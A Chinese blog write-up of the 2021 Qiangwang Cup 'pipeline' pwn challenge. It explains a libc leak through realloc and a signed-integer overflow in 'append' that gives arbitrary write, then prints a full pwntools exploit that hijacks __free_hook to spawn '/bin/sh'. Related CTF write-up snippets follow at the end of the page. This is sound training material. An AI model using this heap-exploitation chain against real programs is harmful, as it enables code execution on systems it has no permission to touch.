2021强网杯 pwn pipeline

最新推荐文章于 2022-08-08 17:10:14 发布
最新推荐文章于 2022-08-08 17:10:14 发布
阅读量258 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/118164505
版权

在这里插入图片描述
保护当然是全绿。

在这里插入图片描述
fastcall的调用方式让程序看起来有点奇怪,因为fastcall函数调用用寄存器调,反汇编不了,还是得读汇编。

在这里插入图片描述一个一个来。

new
在这里插入图片描述
chunk申请后写地址的方式还跟平常的不大一样。
允许申请10个chunk,然后用chunk复用的那个地方,也就是prev_size那个地方构成一个单链表,4058指向第一个chunk,然后每个chunk的复用位置存放下一个chunk的指针。

还会有检查。
在这里插入图片描述
里面反复提到4050,找到他。
在这里插入图片描述4050处申请了一个0x10大小的chunk,里面存了一会你将会申请到的第一个chunk的chunk头,放了一个0x21000数字。

他想的是防止你申请到别的地方,要求你只能申请到堆,但是其实在判断的时候4050存放的是下一个chunk的chunk头,但是你申请回来并且比较的是chunk的内容部分,差了一个0x10,不知道有没有用,先往后看。

edit
在这里插入图片描述刚刚申请的chunk分成四个部分,分别是8、4、4、8,作用分别是内容chunk地址,偏移,内容大小,链表指针。

在这里插入图片描述申请chunk写内容的时候用的是realloc,地址大小都可控,那就有问题。
但是要注意他下面针对realloc造成的free做了处理。

destory
在这里插入图片描述
就是找到那个chunk,然后拿出来,一个出链的过程。

这个是append
在这里插入图片描述
说白了这个程序就是通过offset来实现了一个我们能接着内容去输入。

show
在这里插入图片描述
只能输出offset后面的。

所以我们总结一下这个程序的大概功能,new申请,edit修改偏移,修改大小。append就是读入,根据偏移实现读入。destory删除,show输出偏移开始的内容。整个数据结构是一个单链表的结构。

首先要考虑的还是泄露libc地址。libc是2.31。可以利用前面的realloc来申请释放,获得一个unsorted 的chunk,然后通过泄露libc地址。

然后我门发现在append的时候,有个问题。

在这里插入图片描述

append的时候本来限制了我们不能随便写,但是这里的v3是int类型,是有符号的。插一嘴atoi这个函数其实是不接受负数的,但是我们这里如果让它整数溢出,v3就是负数,就一定小于v1,而且我们合理调整v3,可以让v1很大,然后可以做到任意写,就可以轻松劫持free_hook。

exp

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = "debug"

r = process("./pipeline")

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

def new():
    r.sendlineafter(">>", "1")

def edit(index,offset,size):
    r.sendlineafter(">>", "2")
    r.sendlineafter("index: ",str(index))
    r.sendlineafter("offset: ",str(offset))
    r.sendlineafter("size: ",str(size))

def destory(idx):
    r.sendlineafter(">>", "3")
    r.sendlineafter("index: ",str(index))

def append(idx,size,data):
    r.sendlineafter(">>", "4")
    r.sendlineafter("index: ",str(idx))
    r.sendlineafter("size: ",str(size))
    r.sendlineafter("data: ",data)

def show(idx):
    r.sendlineafter(">>", "5")
    r.sendlineafter("index: ",str(idx))

new() #0
edit(0,0,0x500)
new() #1
new() #2
edit(0,0,0)
edit(0,0,0x500)
show(0)

malloc_hook = (u64(r.recvuntil("\x7f")[-6:].ljust(8, "\x00")) & 0xfffffffffffff000) + (libc.sym["__malloc_hook"] & 0xfff)
libc_base = malloc_hook - libc.sym['__malloc_hook']
print "libc_base = " + hex(libc_base)
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']

append(0,0xffff2000,'A'*0x500+p64(0)+p64(0x21)+p64(free_hook)+p64(0)+p64(0x100))

append(1,0xffff2000,p64(system_addr))
append(0,0xffff2000,"/bin/sh\x00")
edit(0,0,0)

r.interactive()
yongbaoii
关注
专栏目录
强网杯2021 pwn部分wp
eeeeeight的博客
06-18 1318
baby_diary: 本题考查2.31的off by one, 漏洞处如下: 在sub_146e中会将输入数据的ASCII码相加再相加相加…直到变成一个byte的数字, 然后加到输入数据的后一位上, 因此我们可以尝试控制输入的内容, 从而控制下一个chunk的size大小 在确定完溢出点后, 我们便开始准备伪造chunk了, 由于要满足p->fd->bk == p, p->bk->fd == p以及prevsize == size, 我们需要申请一个largebin的chunk
2021鹤城杯pwn部分wp
eeeeeight的博客
10-09 2112
littleof 白给的ret2libc, 第一个输出泄露canary, 第二个输出泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
2021强网杯 pwn baby_diary
yongbaoii的博客
07-15 375
保护 熟悉得菜单 write 这里有个稍稍复杂的机制。 read delete 看得到清理得还是很干净的。
强网杯2021 pwn writeup by syclover
qq_51868336的博客
06-15 893
no_output 首先是利用strcpy把fd给覆盖为0 然后read hello_boy 通过检测 接着触发算数运算错误 就能进入栈溢出函数 最后就是直接用32位ret2dlresolve的模板了 from pwn import * arch = 32 challenge = "./test" local = int(sys.argv[1]) context(log_level = "debug",os = "linux") if local: r = process(chal
强网杯2021 pwn题解析——babypwn
CoLin的pwn小屋
07-26 877
强网杯2021 pwn 赛题回顾——babypwn
2021强网杯wp
灰太的表格的博客
06-15 2146
(这次比赛做出的四个web总结下。赛后过的两天才写的wp的有好多可能没记录到,自己还比较菜,师傅们轻点喷。。) 赌徒 寻宝 pop_master easyweb 赌徒 打开提示/etc/hint文件。源码泄露有web.zip <meta charset="utf-8"> <?php //hint is in hint.php error_reporting(1); class Start { public $name='guest'; public $flag='sys
强网杯2022 pwn题解析.docx
最新发布
12-18
强网杯2022 Pwn题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
强网杯2022 pwn题解析——house_of_cat
CoLin的pwn小屋
08-04 3095
强网杯2022 pwn 赛题分析——house_of_cat
2021强网杯Writeup--by Nu1L Team.pdf
06-15
第五届“强网杯”全国网络安全挑战赛
强网杯2021 [强网先锋]orw
半岛铁盒的博客
06-29 818
orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 因为不是FULL RELRO所以就考虑改got表为shellcode地址就行了 漏洞点就在于以上两点 令index下标为负数时可以覆盖到其他函数的got表地址 这里选择覆盖掉exit的got表中的地址,因为沙盒的存在,所以需要构造orw的shellcode并覆盖exit的got地址为shellcode 覆盖堆块的申请位置选择在这里 计算一下偏移量 起始点 0x
强网杯2022 pwn题解析——yakagame
CoLin的pwn小屋
07-31 3358
强网杯2022-pwn yakagame write-up
2021强网杯 pwn babypwn
yongbaoii的博客
07-15 622
libc是2.27的。 保护全开。 还开了沙箱。 经典增删改查。 add 最多17个chunk,chunk的大小最大0x200.地址跟发小都放在了bss上面。 delete 清理的很干净。 edit edit也看着没啥,里面有个函数,进去看看。 会把所有的’\x11’变成’\x00’,但是问题就出在它没有边界,仅仅是到’\x00’就停而已。那么我们就可以有越界,来造成off by null。 show 输出都点不大正常。首先发现它是前后四个字节分开的。 然后看一下那个输出函数。 加密的,好家伙。 先.
2021强网杯】Write-Up真题PWN和RE部分(强推)
kali_Ma的博客
06-16 1463
前言 不得不说强网的反作弊做的真心不错 re 不一样 真心可以 话不多说,请往下看: baby_diary 参考实现堆块复用,后面就是常规题目 EXP # encoding:utf-8 from pwn import * libc=ELF('./libc-2.31.so') def add(size,data='a'): p.recvuntil('>> ') p.sendline('1') p.recvuntil('ize: ') p.sendline(str(size)) p.
2021强网杯全国网络安全挑战赛Writeup
道阻且长,行则将至。
06-20 7704
文章目录前言强网先锋-赌徒PHP的魔术方法题目POP链构造强网先锋-寻宝Key1之代码审计Key2之脚本搜索 前言 上周末端午假期期间(6月12日9:00至6月13日21:00)参与了为期 36h 的第五届强网杯网络安全竞赛,不得不说题目比去年难多了,两天下来腰酸背痛脑壳疼……比赛的数据大致如下: 幸运的是最终在实力傍队友的情况下,又一年获得竞赛前 10% 有效排名的 “强网先锋” 称号,在此记录下比赛的 Writeup。 强网先锋-赌徒 1、下发赛题,访问地址如下: 2、结合题目源码提醒,利用 dir
2019广东省强网杯PWN-1
SkYe's Blog
09-24 747
2019广东省强网杯PWN-1 题目分析 题目提供了:可执行文件、libc.so.6两个文件。下面开始分析,首先运行程序,如下图所示: 这是一道菜单题目,可以添加、删除、运行。是一道在堆上的题目。然后用IDA分析程序的流程。 首先看看主函数(main),对其中的部分函数做了重命名(在图中红框内函数),可以参照修改。 主函数 主函数循环执行,直到遇到exit()。首先是运行welcome_bro...
强网杯2022 pwn题解析——yakacmp
CoLin的pwn小屋
08-07 1036
强网杯2022 pwn题解析——yakacmp
2022强网杯WP
CK_0ff的博客
08-08 2876
2022强网杯WP
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值